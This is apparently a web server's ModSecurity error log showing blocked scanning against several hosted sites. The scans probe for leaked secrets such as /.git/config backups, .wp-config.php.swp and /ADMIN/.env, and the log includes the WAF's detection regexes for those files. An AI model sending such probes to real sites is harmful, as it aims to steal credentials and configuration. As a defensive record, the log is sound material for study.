[Tue May 26 14:01:41.537394 2026] [security2:error] [pid 578581:tid 578617] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.git/config.bak"] [unique_id "ahVabZm_8al1sb-umPtmIQAAECM"]
[Tue May 26 14:01:41.540369 2026] [security2:error] [pid 578581:tid 578611] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.git/config.old"] [unique_id "ahVabZm_8al1sb-umPtmIgAAEB0"]
[Tue May 26 14:01:41.551028 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmGgAAECE"]
[Tue May 26 14:01:41.552980 2026] [security2:error] [pid 578581:tid 578626] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.git/config~"] [unique_id "ahVabZm_8al1sb-umPtmJQAAECw"]
[Tue May 26 14:01:42.155773 2026] [security2:error] [pid 578581:tid 578783] [client 4.193.189.92:2191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/b.php"] [unique_id "ahVabpm_8al1sb-umPtmSQAAAEg"]
[Tue May 26 14:01:42.284774 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmGwAAECI"]
[Tue May 26 14:01:42.295022 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmHAAAEB4"]
[Tue May 26 14:01:42.305353 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmHQAAEB8"]
[Tue May 26 14:01:42.328267 2026] [security2:error] [pid 578581:tid 578633] [remote 74.7.241.58:39120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVabpm_8al1sb-umPtmTQAAYzM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Key_Value_Cache
[Tue May 26 14:01:42.329195 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmHgAAECY"]
[Tue May 26 14:01:42.398314 2026] [security2:error] [pid 578581:tid 578834] [client 2a01:4f9:2b:1ae5::2:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVabZm_8al1sb-umPtmPwAAezE"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 14:01:42.398736 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmKwAAECo"]
[Tue May 26 14:01:42.401848 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmIAAAECc"]
[Tue May 26 14:01:42.404809 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmLAAAEC4"]
[Tue May 26 14:01:42.406034 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmMwAAEDA"]
[Tue May 26 14:01:42.418757 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmKAAAEC8"]
[Tue May 26 14:01:42.421112 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmKgAAECk"]
[Tue May 26 14:01:42.430350 2026] [security2:error] [pid 578581:tid 578772] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmQgAAAD0"]
[Tue May 26 14:01:42.431950 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmHwAAEBo"]
[Tue May 26 14:01:42.448211 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmJgAAECU"]
[Tue May 26 14:01:42.454260 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmNgAAEDk"]
[Tue May 26 14:01:42.454953 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmKQAAEC0"]
[Tue May 26 14:01:42.455800 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmMQAAEDo"]
[Tue May 26 14:01:42.481910 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmNwAAECs"]
[Tue May 26 14:01:42.566167 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmTgAAEDQ"]
[Tue May 26 14:01:42.574750 2026] [security2:error] [pid 578581:tid 578641] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmUAAAEDs"]
[Tue May 26 14:01:42.901072 2026] [security2:error] [pid 578581:tid 578742] [client 4.193.189.92:6402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/buy.php"] [unique_id "ahVabpm_8al1sb-umPtmYQAAAB8"]
[Tue May 26 14:01:43.279958 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmTwAAEEI"]
[Tue May 26 14:01:43.303380 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmUQAAEDw"]
[Tue May 26 14:01:43.398022 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmYwAAEEQ"]
[Tue May 26 14:01:43.402360 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmZAAAEEo"]
[Tue May 26 14:01:43.403040 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmZwAAEE4"]
[Tue May 26 14:01:43.408944 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmaQAAEEY"]
[Tue May 26 14:01:43.409206 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmaAAAEEw"]
[Tue May 26 14:01:43.410368 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmZQAAEEc"]
[Tue May 26 14:01:43.410557 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmYgAAEEU"]
[Tue May 26 14:01:43.414276 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmbwAAEFI"]
[Tue May 26 14:01:43.416742 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmbgAAED0"]
[Tue May 26 14:01:43.417059 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmawAAED4"]
[Tue May 26 14:01:43.433374 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmcAAAEFs"]
[Tue May 26 14:01:43.449051 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmZgAAEE0"]
[Tue May 26 14:01:43.453783 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmbQAAEEM"]
[Tue May 26 14:01:43.469644 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmagAAED8"]
[Tue May 26 14:01:43.552102 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmeQAAEEg"]
[Tue May 26 14:01:43.616443 2026] [security2:error] [pid 578581:tid 578824] [client 4.193.189.92:6655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/bless.php"] [unique_id "ahVab5m_8al1sb-umPtmjQAAAHE"]
[Tue May 26 14:01:44.046348 2026] [security2:error] [pid 578581:tid 578804] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmjgAAAF0"]
[Tue May 26 14:01:44.381423 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmfQAAEEs"]
[Tue May 26 14:01:44.387781 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmfwAAEE8"]
[Tue May 26 14:01:44.392762 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmfgAAEFE"]
[Tue May 26 14:01:44.400970 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmgwAAEEE"]
[Tue May 26 14:01:44.401332 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmjAAAEFk"]
[Tue May 26 14:01:44.407078 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmgQAAEEA"]
[Tue May 26 14:01:44.407884 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmgAAAEFA"]
[Tue May 26 14:01:44.410373 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmhQAAEFU"]
[Tue May 26 14:01:44.410569 2026] [security2:error] [pid 578581:tid 578800] [client 4.193.189.92:6568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/class-t.api.php"] [unique_id "ahVacJm_8al1sb-umPtmqwAAAFk"]
[Tue May 26 14:01:44.423250 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmiAAAEFg"]
[Tue May 26 14:01:44.424069 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmhwAAEGs"]
[Tue May 26 14:01:44.426430 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmhgAAEFQ"]
[Tue May 26 14:01:44.431692 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmhAAAEFM"]
[Tue May 26 14:01:44.432266 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmkQAAEFc"]
[Tue May 26 14:01:44.451056 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmggAAEGw"]
[Tue May 26 14:01:44.452016 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmlQAAEFo"]
[Tue May 26 14:01:44.453234 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmigAAEF0"]
[Tue May 26 14:01:44.542548 2026] [autoindex:error] [pid 578581:tid 578685] [remote 195.178.110.199:38276] AH01276: Cannot serve directory /home2/jhonwy9v/blog.jhonweb.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:01:44.546303 2026] [security2:error] [pid 578581:tid 578692] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVacJm_8al1sb-umPtmswAALm4"]
[Tue May 26 14:01:44.558504 2026] [security2:error] [pid 578581:tid 578683] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/ADMIN/.env"] [unique_id "ahVacJm_8al1sb-umPtmtgAALmU"]
